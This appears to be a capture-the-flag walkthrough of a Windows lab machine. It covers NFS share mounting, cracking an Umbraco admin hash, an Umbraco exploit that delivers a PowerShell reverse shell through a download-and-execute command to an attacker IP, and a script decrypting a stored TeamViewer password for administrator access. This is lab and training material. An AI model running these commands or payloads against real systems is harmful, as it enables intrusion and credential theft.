信息收集
IP Address | Opening Ports |
---|---|
10.10.10.180 | TCP:21, 80, 111, 135, 139, 445, 2049, 5985, 47001, 49664, 49665, 49666, 49667, 49678, 49679, 49680 |
nmap -p- 10.10.10.180 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
22975/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
63748/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Umbraco && NFS
$ whatweb http://10.10.10.180/ -v
$ showmount -e 10.10.10.180
$ sudo mkdir -p /mnt/10.10.10.180
$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/10.10.10.180
$ strings App_Data/Umbraco.sdf | grep admin
username:adminadmin@htb.local
hash:b8be16afba8c314ad33d812f22a04991b90e2aaa
$ hashcat -m 100 b8be16afba8c314ad33d812f22a04991b90e2aaa /usr/share/wordlists/rockyou.txt --force
password:baconandcheese
登录
http://10.10.10.180/Umbraco#/login/false?returnPath=%252FUmbraco
https://www.exploit-db.com/exploits/46153
反向shell
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.24 -Port 10032">>Invoke-PowerShellTcp.ps1
将powershell脚本上传目标
string cmd = "/c powershell -c iex(new-object net.webclient).downloadstring(\'http://10.10.16.24/Invoke-PowerShellTcp.ps1')";
$ python exp.py
User.txt
c9b78c488c6ae1828b13d050b156d542
权限提升
TeamViewer应用程序
在msf的插件中提及到Version7的注册表路径是HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7
PS HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .
PS HKLM:\software\wow6432node\teamviewer\version7> (Get-ItemProperty -Path .).SecurityPasswordAES -join ", " | ForEach-Object { "[" + $_ + "]" }
#!/usr/bin/env python3
from Crypto.Cipher import AES
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
126, 141, 55, 107, 38, 57, 78, 91])
aes = AES.new(key, AES.MODE_CBC, IV=iv)
password = aes.decrypt(ciphertext).decode("utf-16").rstrip("\x00")
print(f"[+] Found password: {password}")
$ python dec.py
$ crackmapexec smb 10.10.10.180 -u administrator -p '!R3m0te!'
$ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
Root.txt
858343dff7922d618a28508565307822